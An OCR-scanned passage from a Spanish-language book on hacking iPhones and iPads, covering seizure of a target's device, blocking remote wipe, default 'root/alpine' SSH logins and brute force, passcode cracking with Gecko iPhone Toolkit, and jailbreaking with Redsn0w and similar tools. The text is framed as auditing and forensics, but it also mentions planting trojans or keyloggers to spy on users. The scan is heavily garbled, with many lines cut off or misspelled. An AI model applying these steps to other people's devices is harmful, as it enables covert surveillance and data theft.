en el que el dueño haya conectado su terminal a iTunes, para sincronizarlo. 


Si el equipo se conecta, vía Wi-fi, vía cable, o vía Bluetooth a un equipo con el que ha sido parcado 
previamente, entonces, sin conocer el passcode será posible acceder a toda la estructura de carpetas 
con una aplicación tipo ¿FunBox, tal y como puede verse en la siguiente imagen. 
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e comportamiento será similar si el usuario ha realizado un proceso de Jailbreak, y ha dejado 
usuarios y contraseñas por defecto para que funcionen con OpenSSH, lo que hará que no sea 
Ecesario conocer el passcode para poder acceder a todos los ficheros desde cualquier sistema. 


Creación de un laboratorio 


ñ caso de que se deseen hacer prucbas con iPhone, ya sean las locales (que se han visto en uste 
pítulo) o las que se van a describir a lo largo del presente libro, es necesario ser paciente e ir 
cionando los diferentes modelos con diferentes versiones. Por cada modelo hay que tener uno 
n cada versión del sistema operativo que soporte, para disponer así de una réplica exacta de lo que 
aga el dispositivo objetivo del ataque. 


versiones ¡Phone 4 con ¿OS hasta 4.3.4 cra posible ir guardando los SHSH firmados por Apple 
cada versión, esto obliga a tener versiones con Jailbreak para poder volver a dejar una versión 
creta que interese, en un momento determinado. Herramientas como Tiny Umbrella sirven para 


propósito. 


ara ¿Phone 45 con iOS 5 v ¡Phone 3 con ¡OS esto no es tan sencillo ya que los SHSH de Apple ya 
valen, así que lo ideal sería disponer de terminales de las diferentes serics para tener “un poco de 
do” y poder asi preparar la estrategia antes de liempo. 


webs, como MucConverter.es donde se pueden ir comprando versiones antiguas a buen precio. 


EN. Hacking de dispositivos iOS: iPhone & iPad 


Por último hay que disponer de los cables de conexión clásico y lighining, con todos los conectores 
posibles, para poder así utilizarlos en un determinado momento y, por supuesto, tener las llaves de 
extracción de SIM o clips necesarios. 


Alo largo del libro se irán mostrando más herramientas de software y de hardware que serán muy útiles 
para las auditorías de seguridad con dispositivos móviles de Apple. Otras herramientas provechosas 
pueden ser las tarjetas interposter para liberar un terminal de un operador o los extractores de datos 
de las diferentes tarjetas SIM, para un hipotético análisis forense. 


Capítulo HI 
Jailbreak 


Requisando el dispositivo 


el proceso de auditoría se ha determinado que hay que requisar el terminal porque hacen falta 
datos que hay cl mismo. Se requiere acceder a la información que está almacenada en él, y por 
into es necesario interceptar el dispositivo a un objetivo para hacerle un análisis forense en toda 
o para introducirle algún troyano que permita espiar las acciones del usuario en remoto. En 
itiva, hay que obtener el terminal. 


embargo. esto que parece muy evidente puede que no sea lo más recomendable. si no va a ser 
¿ble acceder al terminal, y hasta que se liberen nuevas versiones de Jailbreak, llevarse un terminal 
ne 5 o ¡Phone 48 con ¡OS 6 sin conocer el passcode puede significar que no se obtengan más 
s de los que se pueden sacar con los trucos de hacking locales explicados en el capítulo de 
one Local Tricks”. 


esos casos, la única opción que queda es intentar averiguar el passcode previamente usando alguno 

los trucos ya explicados, para luego poder hacer el análisis del terminal con las herramientas que 

van a explicar a continuación o requisar también un equipo en el que Apple ¡Tunes esté pareado 

el terminal ¿Phone o iPad, ya que entonces el problema de acceder al terminal se reducirá al 

blema de acceder al equipo, ya que si el terminal está parcado es posible acceder sin conocer el 
code a la estructura de ficheros. 


contrario el terminal es un ¡Phone 3GS, iPhone 4 0 iPhone 45 con iOS 5.X, entonces requisar 
ivo es una buena opción para poder sacar información jugosa de la auditoría mediante un 
álisis forense, ya que para todos ellos existe la posibilidad de acceder al sistema de ficheros sin 
esidad de conocer cl passcode. Para ello, se va a proceder con diferentes herramientas que lleven 
analista a tener un control total del dispositivo y devolverlo al ducño a gusto de aquel. 


vez que se han decidido los objetivos a requisar, ya sea el terminal ¡OS y/o el equipo pareado 
Apple iTunes, es necesario tomar alguna protección extra. Los datos en un dispositivo ¿Phone 
straido se pueden perder por una mala manipulación por parte del analista (hay que transportar 
¡pre el terminal de manera segura), o por un sistema de autodefensa del terminal, que básicamente 
n dos: 
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- Find My iPhone: Esta herramienta permite al dueño de un terminal perdido enviar un 
comando para que se borren todos los datos del dispositivo. Esta orden llega a través de 
Internet y para evitar su efecto hay que bloquear cualquier conexión a Internet del terminal. 
Para ello hay que evitar la conexión a la red de telefonia, redes de datos GPRS o 3G. Es decir, 
hay que quitarle la STM al terminal 


En segundo lugar hay que evitar que se conecte por medio de cualquier red Wi-Fi en el 
momento en que se vaya a encender el sistema, por lo que hay que intentar encenderlo y 
manipularlo en una ubicación en la que no haya ninguna red Wi-Fi cerca, y si es necesario, 
construir una caja /“araday como explican los miembros de Taddong en el libro de “Hacking 
y seguridad en comunicaciones móviles”. 


Qax 


Imagen 03.01: Fundas Faraday para transp 


ir terminales sin d exterior. 


necti 


Si no se dispone de una caja o funda Faraday, es recomendable dirigirse a una ubicación 
donde se tengan monitorizadas las redes Wi-Fi, y utilizar alguna de las herramientas que 
permitan conocer todas las que haya alrededor. 


- Borrado de datos por número de fallos en passcode: Ln el capítulo de ¡Phone Local 
Tricks ya se mencionó que hay una protección que borra los datos si el número de fallos es 
igual a 10. Si el analista no está seguro de si esa opción está activada o no, se recomienda no 
probar passcodes al azar. 


Hay que tener en cuenta, en caso de haber tomado posesión también del equipo PC pareado que esto 
mismo puede suceder con él. Existen herramientas de monitorización remota que realizan también 
el borrado de datos de forma segura, como por ejemplo la popular aplicación Prey, que puede que 
arruinen todo el proceso de auditoría, o simplemente existan aplicaciones configuradas con servicios 
en la nube que permitan localizar el equipo remotamente. 


Además, antes de tomar el control de un ordenador. hay que tener presente que existen soluciones 
de cifrado completo del mismo como BitLocker, TrueCrypt o File Vault, que evitarian el acceso al 
sistema y por tanto el poder sacar provecho del pareo con el terminal ¡Phone o iPad. 


Una vez que se dispone del dispositivo asegurado y encendido en una ubicación segura, y del equipo 
que se ha decidido a interceptar, llega el momento de tomar el control del terminal o evaluar las 
opciones que quedan. 


Capítulo 111. Jailbreak 


Información del reporte 
Nombre dispositivo: 1kacUs 
(Creado: 2010-0328 08 3%:40 UTC 
Agente de usuario: PreyiD 4 (riac) 


Captura de pantalla 


[REJOTOCO tem dar Os = hace 3 minutos 
(12387833 ken BAMacOs hace TA mitos 
17796 fen JEtMacOs - hace 17 minutos 


Eliminar este repor 


TImugen 03.02: Acceso reaioto por Prey a mas máquina Mar OS Y. 


2. Accediendo a los datos del sistema 


Para acceder al terminal e inspeccionar el contenido del dispositivo y de las aplicaciones, como 
la base de datos de los mensajes de Whaisapp, las cookies de sesión de las aplicaciones como 
Facebook, Linkedin o cualquier otra, acceder a los datos de las llamadas de teléfono, o en definitiva 
hacer un análisis forense del contenido de los datos existen varias alternativas que pueden utilizarse: 


- Análisis del backup de ¡OS en el equipo pareado: Este análisis se muestra en detalle en 
el capítulo de “X Xanálisis forense del backup”. 

Análisis forense del terminal desde el equipo pareado: Si se tiene control del equipo 

parcado, se puede concelar el terminal a él, y bien haciendo uso de herramientas como 
ilíumisoyz que permiten acceder a la estructura de ficheros o con soluciones profesionales 
como Oxyeen Forensic Suite extraer todos los datos. Para ello, lo más fácil es instalar estas 
herramientas cn el equipo parcado y hacer el trabajo de extracción de datos y de análisis 
desde el mismo. 
- El terminal tiene Jailbreak y OpenSSH: Si el usuario dueño del terminal había hecho 
Jailbreak al sistema, entonces conviene probar a conectarse via OpenSSH con el usuario root 
con contraseña alpine. Si esto no fuera posible habría que probar otras opciones, ya que es 
posible que el usuario haya fortificado su instalación de OpenSS!1. 
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Para ello, primero hay que localizar el puerto de OpenSSH, ya que este puede haber cambiado. 
Por lo tanto el primer paso es realizar un esceneo de puertos con alguna herramienta como 
Nmap para estar seguro de en qué puerto está el servidor OpenSSL, si es que estuviera. 


Una vez localizado el servidor OpenSSH es necesario recordar que no solo está el usuario root 

con contraseña a/pine, sino que también es posible utilizar el ti or contraseña 
ya que tal vez se hayan cambiado las password de root, pero no la de este usuario, que 

aunque tiene muchos menos privilegios también permitirá acceder a los datos de las apps. 


En último lugar, si se ha conseguido encontrar el puerto, pero no las contraseñas, se puede 
intentar un ataque de fuerza bruta o diccionario. En la configuración de OpenSSH que se 
realiza en el fichero /etc/ssh/sshd_config se establece el número de intentos antes de “tirar 
abajo la conexión” en el parámetro MaxAurhTries. Este parámetro por defecto viene 
comentado, con lo que es posible probar hasta el infinito. 


Imagen 03.03: Parámetro MuxAuthTries de OpenSSH. 


- — El terminal tiene passcode, no tiene Jailbreak, pero es un iPhone 3GS/4: En este caso 
se puede intentar romper primeramente el passcode utilizando una herramienta como Gecko 
iPhone Toolkit para, una vez obtenido el passcode, conectarse al terminal y acceder a todos 
los datos con alguna de las alternativas presentadas, aunque la más eficiente seria mediante 
una herramienta de análisis forense profesional. 


Se puede utilizar Geckof porque como ya se verá más adelante se basa en un exploit que solo 
funciona en los chips A4, por lo que no es factible usarlo en ¿Phone 48 o ¡Phone 5. Además 
hay que tener en cuenta que es posible que el usuario, como se muestra en el capítulo de 
iPhone Local Tricks, tenga un passcode demasiado complejo que no permita obtencrlo cn 
tiempo útil, para lo que habrá que evaluar otras alternativas. 


El terminal tiene un passcode complejo, na tiene Jailbreak, pero es un iPhone 3GS/4: 
La última opción posible es utilizar un Jailbreak Ra e decir. que se encuentra antes 
del arranque completo del sistema. lo que permite explotar las vulnerabilidades sin necesidad 
de conocer el passcode, y ejecutar programas en el terminal, como por ejemplo OpenSSH. 
Esto se verá un poco más adelante en este mismo capítulo. 


El terminal es un iPhone 4S o un iPhone 5, tiene un passcode que no se ha podido 
averiguar, no tiene Jailbreak y no se tiene un equipo pareado: Toca esperar hasta que 
salga algún exploit de BooiRom, que de momento no existe. Lo único que se puede hacer es 
no apagar el terminal, averiguar a qué redes Hi-Fi se está conectando, y analizar el tráfico 
para ver si es posible acceder a algún dato tal y como como se explica en el capítulo de 
XXAlaques de red a iPhone. 
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cando el passcode con Gecko iPhone Toolkit 


ko es una herramienta gratuita que funciona bajo Windows, y que se puede descargar de varios 
ios web. La herramienta básicamente realiza un ataque de fuerza hruta o diccionario al passcode de 
dispositivo ¿Phone, aunque tiene el inconveniente de que no funciona para todos los dispositivos 
S. En el momento de escribir este libro, funciona solo con ¿Phone 3GS, iPhone 4 GSM, iPad 1, 
tod Touch (2G, 3G y 4G). 


funcionamiento es muy simple, y consiste en dos pasos. 


- Primer paso: Es necesario conocer el modelo exacto del terminal y la versión exacta del 
sistema operativo, para lo que se deben utilizar las técnicas descritas en el capítulo de ¡Phone 
Local Tricks. Si no se ha podido obtener la versión de iOS exacta se puede intentar conectar 
el terminal a una red Wi-Fi (analizando las redes que busca y creándole una Rogue AP) para 
poder analizar las cabeceras User-Agent y saber exactamente la versión. 

Una vez que se tiene esa información. cuando se arranca la herramienta se hace clic en el 
botón Boot con el teléfono conectado y apagado. Para ello, hay que enchufar el terminal 
encendido con el cable al equipo donde está Gecko, y una vez concctado se apaga el 
dispositivo. Esto dejará el terminal conectado físicamente con el cable al ordenador pero con 
el sistema operativo apagado. 

Una vez se haya dado al botón Boot, Gecko iPhone Toolkit solicitará el firmware original 
acorde a la versión de ¡OS que corre en el dispositivo, tal y como se muestra en la siguiente 
captura en la que el ataque se va a realizar sobre el passcode de un iPad. 


Imagen 03.04: Gecko ¿Phone Toolkit solicitando el firmware original de Apple. 


Es necesario que ese firmware esté en el ordenador descargado para que pueda ser seleccionado 
desde Gecko, por lo que habrá que descargarlo previamente. Para localizar todo el firmware 


necesario para este tipo de ataques, lo mejor es utilizar una web como tp: 24 getios:com.y 


aunque también están disponibles en las web de 4pple. 


ios: 


mws E z 


Imagen 03.05: 


specto de la web gerios.com para descargar firmwares de iOS. 
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Una vez descargado y seleccionado el firmware correcto en Gecko iPhone Toolkit, 
automáticamente se abre la aplicación Redsn(w, que viene incluida dentro de las herramientas 
de Gecko. Esta herramienta es una herramienta de Jailbreak muy popular que se explicará un 
poco más adelante para utilizarla de manera independiente. 

Como se puede ver, ¿Phone Gecko Toolkit utilizará Redsn0w para lanzar el exploit de 
BootRom contra el dispositivo con el firmware original con alguna modificación necesaria 
introducida por Gecko para poder hacer el ataque de fuerza bruta y conseguir crackear el 
passcode del dispositivo, 

Para conseguir lanzar el ataque al passcode con Gecko iPhone Toolkit, desde RedsnQw habrá 
que realizar la típica combinación de teclas, de igual manera que cuando se haga un Jailbreak 
al terminal, para entrar en modo DFU (Device Firmware Update) y que Apple ¡Tunes no de 
error. Para eso hay que seguir detalladamente los pasos que indica la aplicación y llevar bien 
la cuenta de los segundos. Todo está explicado paso a paso en Redsn0w. 


Please make sure your device is both OFF and PLUGGED IN to the 
computer 

Ifitis not off, plug the device into the computer FIRST. Then, 
hold dawn the Power button (on the edge of the device) unti 
'Slide to Power OfP appears, and then slide to power off. 


¡Click next ONLY when your device is BOTH off and plugged in. 


(If you already know how to enter DFU mode, you may do so 
right now from this screen without didáng next.) 


Imagen 03,06; Redsn0w abierto de manera automática e indicando que se debe hacer. 


Una vez terminados los pasos. y entrado el dispositivo en modo DFU, comenzará el ataque al 
passcode, para lo que previamente se podrá visualizar un gran mensaje de OK en la pantalla 
del terminal, y se habrá terminado correctamente la primera fase del ataque. 


Podria darse el caso de que al realizar la combinación de teclas esta no se reali 
correctamente, o incluso que se aplicase de forma correcta pero un poco a destiempo. En 
tal caso no habría ningún problema, ya que si el proceso no tuviera éxito a la primera, solo 
se debe intentar de nuevo, volviendo a apagar el terminal estando conectado al ordenador y 
comenzar desde el principio. Con un poco de práctica este proceso de poner el dispositivo en 
modo DFU se podrá realizar con los ojos cerrados y con un 100 % de éxito siempre. 


pase 


Capitulo IH. Jailbreak 


hecking perfa 
check ir 
dev /ad8 


Imagen 03,07: Mensaje de OK que aparecerá en el terminal con ¿Phone Gecko Toolkir 


Segundo paso: Una vez que el proceso de .Jailhreak ha finalizado, es momento de hacer 
clic en el botón Launch de Gecko ¡Phone Toolkit. En ese momento comienza cl algoritmo 
de crackeo, que puede tardar varios minutos dependiendo de la velocidad del dispositivo, 
En un ¿Pad 1 con código simple el tiempo necesario para obtener el passcode es de unos 20 
minutos, pero finalmente aparece el passcode, tal como se aprecia en la siguiente captura, en 
la que se ha crakeado el passscode de un ¿Pad 1 con ¡OS 5.0.1 


Read lockscreen password | pasa iphone decile] ua E] rio] avance 
Sep 1: Boot ramdisk using recsn0w 
IPad1 


Rep 2: once redsndw has finished cick Launch 


Password rformatior nsed 
[Device UDID : 1/0rdS98r756bdc 24928468 7bcc08f IfO3d0F 1a 


CAUsers uan NN App Data\LocaNTempools\bruisfurve 
1A0FGOCF75Gbdc2c92ed6a Toc: 08 TUI 2/4711280b 12725050 pist 
¡aescodeKeybuddComplexiy - {rangeMinimum": O, value": 0, tangeMaæxamum": 2) 
[nica al dots pamacodes.. 

temieyBag : 0:19:09. 924000 


10, passcodaKey': 993678 Dece 30056472448 7492ed9242191e08235175840/15cc0476811) 


Imagen 03.08: Gecko después de crackear el passcode deun ¿Pad 1 


Hay que recordar que si el terminal tiene un passcode complejo este proceso puede alargarse c 


incluso no dar con él en un tiempo útil, por lo que será necesario evaluar otras alternativas a este 
procedimiento, 
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3. ¿Qué es Jailbreak? 


Realizar Jailbreak a un dispositivo ¡OS, es el proceso de romper el Code-Signing. que es esa medida 
de seguridad que aplica Apple para que solo se puedan descargar, instalar y ejecutar aplicaciones 
firmadas por una entidad certificadora de confianza, cuya raíz de certificación proviene de la propia 
Apple. Como se menciona en otros capítulos, actúa a modo de protección de seguridad, filtrando los 
contenidos que se suben o se publican en la App Store, dificultando así la propagación o difusión de 
malware y aplicaciones maliciosas. 


Esta medida de seguridad, el Code-Signing, obliga a que todo el software deba ir firmado, por lo 
que cualquier intento de instalación o ejecución, ya sca de una aplicación, o de una página o código 
proveniente de memoria, no es permitida, a menos que vaya firmada digitalmente por un certificado 
que proceda de una entidad de confianza. Esto hace que infectarse sea complicado, pero teniendo en 
cuenta que solo cuando dicha protección está funcionando, por lo que el hecho de realizar Jailbreak 
y romper dicha protección, entraña una serie de riesgos, ya que gran parte de la seguridad del sistema 
cae completamente. 


Realizar un Jailbreak, no solo se rompe la protección de Code: ning, mediante una serie de 
modificaciones a nivel de kernel, y es posible ejecutar código sin firmar, sino que además es posible 
tener un acceso completo el sistema de ficheros, y al sistema operativo, ya que realmente un Jailbreak 
es una forma de escalada de privilegios. 


Hacer un Jailbreak incide y mucho en la seguridad del dispositivo, aunque muchos usuarios 
domésticos crean que realizar este proceso es solo para liberar el terminal y poder instalar en ¡Phone 
o ¡Pad aplicaciones no firmadas por Apple, como extensiones o fweaks, o temas que no estén 
disponibles a través del canal de distribución oficial del fabricante (la App Store), o incluso el uso 
que le dan muchos, que no es más que descargar aplicaciones de pago de manera gratuita, utilizando 
repositorios no oficiales, en donde se encuentran aplicaciones crackeadas, o dicho de otra manera, 
apps a las que se las ha eliminado la protección o DRM. 


En realidad, el Jailbreak es mucho más importante para la comunidad de seguridad, que el hecho de 
ahorrarse unos cuantos dólares o curos, al instalar software sin pagar por él. 


Tipos de Jailbreak 


A lo largo de la historia del sistema operativo iOS, los usuarios han realizado Jailbreak a sus 
dispositivos, y en la mayoría de las versiones de ¿OS. Pero no todos los procesos de Jailbreak 
han ofrecido el mismo conjunto de características, y es que esto depende cn gran parte de las 
posibilidades que ofrezca la vulnerabilidad de seguridad explotada para bypassear las restricciones 
del dispositivo. 


Una vez que las vulnerabilidades son explotadas, inmediatamente se hacen públicas, de manera que 
son parcheadas cuanto antes por Apple (normalmente en la siguiente versión de iOS) por lo que casi 
en cada nueva versión de ¿OS, es necesario encontrar nuevas vulnerabilidades. Es por ello que los 


o 


| autores de las soluciones de Jailbreak demandan colaboración a la comunidad de investigadores, ya 
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que cada nueva versión es un nuevo reto. 


Además, hay que tener en cuenta. que algunas vulnerabilidades residen en la Bov/Rom, por lo que 
no es posible parchearlas con actualizaciones software, sino que habrá que revisar el hardware de 
los terminales iPhone, iPad, etcétera. Esto hace que se requiera un mayor tiempo para subsanarlas y 
reemplazar los chips de los dispositivos. 


Dependiendo del tipo de vulnerabilidad utilizada para desarrollar el Jailbreak, los efectos de realizarlo 
serán persistentes o desaparecerán en cuanto se reinicie el dispositivo, por lo que básicamente existen 
dos tipos principales de Jailbreak: 


Baca un tipo de Jailbreak que desaparece cuando el dispositivo “rcarranca” de 
nuevo, por lo que se requiere realizar el proceso en cada nuevo arranque. Como este proceso 
necesita que el terminal se conccte con el cable USR al ordenador para “rearrancar”, recibe 
de ahí su nombre, que significa algo así como “atado”, debido a la dependencia del cable. 


-  Untethered: Lis un tipo de Jailbreak que no desaparece cada vez que el dispositivo se 
“rearranca”. Evidentemente es una mejor forma de Jailbreak para los usuarios que quieran 
tener siempre cl terminal en este estado, aunque también tiene el inconveniente de que es más 
difícil de conseguir, ya que requiere de vulnerabilidades específicas del sistema de arranque. 


Históricamente han existido vulnerabilidades muy potentes en el B00fRom, pero a dia de hoy ya no 
hay nada parecido desde que Apple sacó los dispositivos con chipset AS. Ahora los exploits son una 
combinación de un 1erhered Jailbreak más exploits adicionales, que permitan la persistencia en el 
dispositivo. 


El Tethered Jailbreak se utiliza para instalar los exploits adicionales en el sistema de ficheros. Esto 
hace que se requieran dos exploits como minimo, uno para ejecutar código arbitrario no firmado, 
y otro para elevar privilegios y poder hacer el patch al kernel, Con lo cual, y una vez aclarado este 
punto, se puede apreciar la dificultad de conseguir un Unthethered Jailbreak, y se puede entender 
el motivo por el que cada día los investigadores tardan más en liberar herramientas que realicen 
Untethered Jailbreak. 


Desde el punto de vista de un investigador de seguridad, un auditor o un analista forense, la 
aplicación de cada tipo de Jailbreak será mejor para cada ocasión. En el caso de una auditoría de 
seguridad donde solo se quiere acceder a los datos (también en un análisis forense) la explotación 
de un Tehered Jailbreak que permita acceder a los datos y luego dejar el dispositivo en su estado 
original es quizás lo más recomendable. Sin embargo. si lo que se quiere es instalar un malware o 

un keylogger. es necesario que el sistema siga funcionando después de cada reinicio. por lo que lo 
deseable seria aplicar un Untethered Jailbreak. 


Hay que tener en cuenta que la mayoría de las herramientas de Jailbreak, primero permitían hacer 
Tethered Jailbreak, y cuando se descubren los exploits necesarios pasar a hacer Untethered Jailbreak. 
Por lo tanto es posible que, si lo que se desea es hacer un Jailbreak no persistente, se necesite una 
versión antigua de la herramienta. 
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A día de hoy, hay repositorios públicos de todas las versiones de todas las herramientas, así que no 
se debería tener problemas en localizar una versión que haga el Jailbreak que se necesite en cada 
momento, Lo recomendable es crear un repositorio propio de software y mantener una copia de 
todas las versiones de todas las herramientas. 


Herramientas de Jailbreak 


Aunque las principales herramientas para hacer Jailbreak son Redsnüw, Evasión y Absinthe, existen 
otras herramientas para realizar un proceso de Jailbreak. En este punto se van a recoger las versiones 
de cada una de ellas, para que se sepa por cual es posible decidirse en cada caso. pero en caso 


de dudas o si se necesita ir más rápido, en Internet existen varios Wizards, que guían sobre qué 
herramientas funcionan en cada dispositivo y versión de iOS, como por ejemplo 


i Es su Dispusilivo de Apple Jailbreakezble y/o Desbloqueabie ? 
Plataforma: 


i Modelo: los: Modum: 
ga m Dg os ga | A [Mor Ja 


ctery Umicek your iPhone! | R de Apple 


Imagen 03.09: Wizard de Jailbreak-me.info. 


+ JailbrcakMe: Fue el proyecto de Comex, y se basa en explotación mediante la visita con 
el dispositivo a una página web (hrrp:/4www.JaiibreakMe.com) que ataca al sistema y realiza 
Untethercd Jailbreak. La última versión de este se estudia en profundidad en el capítulo de 
JailOwnMe. En todos los casos se requiere que la sesión esté abierta, por lo que es necesario 
conocer previamente el passcode. Ha habido tres generaciones: 


-  JailbreakMe: Para sistemas ¡OS 1.1.1 a iOS 2.0 

- JailbreakMe 2.0 (Star): Para sistemas ¡OS 3.1.2 a iOS 4.0.1. En la rama 3.x se parcheo cn 

la versión 3.2.2. 

- JailbreakMe 3.0 (Saffron): Para ¡OS 4.3 a 4.33 y para ¡Phone 4 CDMA en versiones 4.2.6 

24.28. 
» Absinthe: llerramienta para Jailbreak en dispositivos con chipset AS, es decir, funciona con 
iPhone 45 y con iPad 2 y soporta las versiones de ¡OS 5 a ¡OS 5.1.1. Requiere que el sistema 
esté conectado a un sistema parcado o tencr el passcode del terminal antes de hacer el Jailbreak 
para parearlo. 


+ Evasión: Herramienta para hacer Jailbreak en dispositivos con ¡OS 6 a 6.1.2. Se basa en los 
exploits descubiertos por los evad3rs. Se requiere tener el passcode antes de hacer el proceso de 
Jailbreak, ya que los exploits se lanzan con iOS arrancado. 
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> Purpleraln: Herramienta de Jailbreak para iPhone 3GS con iOS 3.0 creada por Geohot. No 
requiere pusscode. 

+ Blackraln: Evolución de Purpleraln para iPhone 3G/3GS. Soporta iOS 3.1, iOS 3.1.1 e iOS 
3.1.2. No requiere passcode. También es de Geohot. 

* Spirit: Creada por Geohoí para todos los disposilivos con ¡OS 3.1.2 a iOS 3.2. Lace Tehered 
Jailbreak y requiere conocer el passcode y usar iTunes. 


+ Limeraln: Herramienta de Geohot que hace Tethered Jailbreak en dispositivos iPhone 3GS, 
iPhone 4 y iPad 1, usando un exploit de BootRom. Es el exploit base para todos los Jailbreak de 
terminales con chipset A4. No requiere passcode. 


+ GreenPoisOn: Usa el exploit S114Tter en el BootfRom que Apple descubrió en el chip AS antes 
de sacarlo, lo que hubiera permitido hacer Jailbreak en todos los equipos con AS en arranque y 
sin passcode. Soporta iPad 1 (iOS 3.2.2), ¡Phone 3GS (108 4.1) y los iPhone 4 (iOS 4.1 a iOS 
4.2.1). No requiere passcode y hace Tethered Jailbreak. 


* Redsn0w: Es la herramienta de Jailbreak por excelencia para terminales ¡Phone 3GS, 
iPhone 4 ¢ iPad 1, aunque a día de hoy soporta el exploit Corona para iPhone 48. iPad 2 o iPad 
3. Permite hacer tethered y Unthethered Jailbreak (dependiendo de las versión de RedsnOw que 
hay más de 50) de ¡OS 3 a iOS 5.1.1. En iOS 6, permite hacer solo Terhered Jailbreak. Ln sus 
primeras versiones se llamaba QuickPwn, pero le cambiaron el nombre rápidamente. Para saber 
la versión exacta se necesita para hacer Untethered Jailbreak a una versión de iOS en concreto. 
es posible consultar su ficha en ¡Phone Wiki: húp:/Mheiphonewiki. com/wiki/Redsn0w 


Desde el punto de vista de un auditor, si el terminal es un ¿Phone 3GS o tiene un chip A4 se puede 
utilizar RedsnQw que no requiere el passcode y se podrá hacer siempre un Jailbreak y acceder a los 
datos. Si el dispositivo es un iPhone 45, un iPhone 5, un ¿Pad 2, un iPad 3 o un iPad 4, habrá que ir 
a Absinthe o Evasión y se necesitará el passcode para capturar los datos. 


A día de hoy, los sistemas iOS 6.1.3 no tienen Jailbreak así que se cierran las opciones si el dispositivo 
está en esa versión y solo se podrá acceder a los datos teniendo el passcode y pareando con él un 
equipo con Apple iTunes. 


Herramientas de Jailbreak por DFU Pwnd 


Existe un método de realizar Jailbreak a los dispositivos que hay que intentar evitar a la hora de hacer 
una auditoría de seguridad o un análisis del dispositivo. es el DFU Pwnd. Este método lo que hace 
es construir un firmware concreto personalizado, con el Jailbreak ya realizado. Después, usando las 
capacidades de Backup y Restore de Apple ¡Tunes sobrescribe el sistema operativo anterior e instala 
el nuevo con el proceso de Jailbreak ya personalizado. Este tipo de ataques borraría todos los datos 
que tuviera el terminal y haría que requisar el terminal no hubiera sido fructífero. 


Este método es útil para aquellos usuarios que quieren instalar una versión anterior del sistema 
operativo y modificar el firmware, pero no para obtener datos del terminal. Herramientas populares 
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de Jailbreak como Redsnüw permiten este método cuando se quiere hacer un “Custom Firmware”, 
pero hay otras que solo utilizan este mecanismo, como son SnhwBreeze o Pwnagelool. 


El Unlock de un dispositivo 


Un término que se suele confundir mucho con el de Jailbreak es el de Unlock, que se utiliza para 
definir el proceso de liberación de un dispositivo del bloqueo de operadora de comunicaciones. 
Muchas operadoras que distribuyen terminales ¿Phone por medio de planes de permanencia, atan el 
uso de ese iPhone o ¡Pad a tarjetas SIM solo de esa compañía. 


Romper esa atadura es lo que se conoce como Unlock, y todas las herramientas, como la popular 
UltraSnOw, utilizan exploits de vulnerabilidades encontradas en el firmware de la banda base del 
modem del terminal. Para un proceso de auditoría en el que se busque obtener datos de un sistema 
o instalar un software de control remoto, las herramientas para realizar Unlock no serían de mucha 
utilidad. 


Imagen 03.10: SIM Interposter para hacer Unlock. 


Como información adicional, para la realización de Unlock a terminales, existen unas tarjetas 
especiales, conocidas como S/M Interposters. Estos chips se montan en la bandeja destinada a la 
SIM, y son un “man in the middle” ente la tarjeta SIM y el hardware de lectura de la SIM de los 
terminales ¿Phone o iPad. 


4. Realizar el Jailbreak 


En este apartado se va a analizar cómo se realiza el proceso de Jailbreak con algunas herramientas, 
para que se pueda constatar cómo es el funcionamiento. Las herramientas que se van a ulilizar son 
RedsnOQw, Absithe y evsiOn. 
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RedSn0w con un dispositivo con chip A4 e iOS 6 

Lo primero que se debe hacer es ejecutar el software de RedsnOw como administrador, para en 
sistemas Microsoft Windows o como usuario sudoer en un sistema opcralivo Mac OS X. Después 
aparece la primera pantalla en la que se aprecian las opciones de inicio. Desde esa pantalla se puede 
realizar el proceso de .Jailbreak, o acceder a los “Extras” que es donde se encontrarán las opciones 
de DFU Pund o de arranque de un terminal con Tethered Jailbreak. 


En este caso se a ver cómo se realiza un proceso de Jailbreak, por lo que hay que hacer clic en 
el botón Jailbreak. Acto scguido aparecerá la segunda pantalla, en la que aparecen una serie de 
indicaciones que van desde qué dispositivos están soportados, hasta los pasos que hay que dar para 
comenzar el proceso de Jailbreak. 


Los pasos con dispositivos de chip A4 son siempre los mismos, primero se conecta el dispositivo 
al cquipo, luego se apaga, y una vez que el dispositivo está conectado y apagado, es momento de 
hacer clic en el botón Next. En el caso de que fuera un equipo con chip AS, sería necesario tener el 
dispositivo pareado con Apple ¡Tunes y tenerlo desbloqueado sin passcode. 


Wile! Tc Unete veraio of redonda, Viekeme! Ihs is the latest verson ofredendw. 
Copyrigh: 2067-2012 Phane Dev Tram, Al nghts reserved. Not Copyright 2007-2912 Pino re Dev-Team. Al rights reserved, Not 
for emors ine. l] fo commerciale. 


Visado cr, Far appart, wat our bica e try sechna JalbreaiQA. 


zalesesk | Iabreahandimlal Cya. R E AAA 
tf veu have an Pase, Pad2, or Pad pesas connect 
rem mude Clares mode) noa. 

cores ii As aodeier dro ———— 


1f you have an sorter device bitsts at = 1 2, you an aiso 
ronner itin normal mece now f you prefer 


ere, mae ae your dec ebet OFF ar PLUGGED IN 
b 


Hit isnt oif, duy the device nto the computer ENST. 
Then hold down the Power button (on the edge of the 
eric) urii Side mames 0 appears, and then 
de to power off. 


Ork next when yor devo s UILI c end plgasdin 
e its suden areboot loop). 


Imagen 03.11: Primeros pasos con redimdw para realizar Jaiibreak. 


Cuando se hace clic en el botón de Next, habrá que poner el dispositivo en modo DFU (Device 
Firmware Update), proceso que se deberá realizar pulsando la combinación de teclas típicas para 
entrar en dicho modo en todos los terminales ¡Phone o iPad. Después de tener el dispositivo en ese 
modo, automáticamente comienza el proceso de realización del Jailbreak. 


La combinación de teclas que pone el dispositivo en DFU, es pulsar primero y durante 3 segundos el 
botón de Encendido (Power button), acto seguido y sin soltar dicho botón pulsar al mismo tiempo el 
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botón Home durante 10 segundos. finalmente soltar el botón de Power y mantener pulsado solamente 
el botón Home durante 15 segundos. De todas maneras. cada paso viene detallado por el propio 
software Redsn(w, que en cada momento le indica al usuario lo que debe ir realizando. 


buttar fi 


2. Without releasing the Power button, alse hold down lhe Home 
{bottom center) button for 10 seconds 


Please use the folowing instruchons to enter DFU mode 
down the Power feoenes) button fo 


Without releanng fe Power button, 250 a 
tos center) button for O çecenáe 


3. Without releasing the Home button, release the Power button 
BUT KEEP holding the Home buttan for 15 seconds 


Imugen 03.1 configuración del terminal en modo DFU guiado por RedSañw. 


roceso. 


Si lodo se ha realizado correctamente y a su debido tiempo, comenzará a realizarse el proceso de 
Jailbreak automáticamente en el dispositivo, si no ha sido así, se producirá un error y será necesario 
comenzar de nuevo con dicho proceso. 


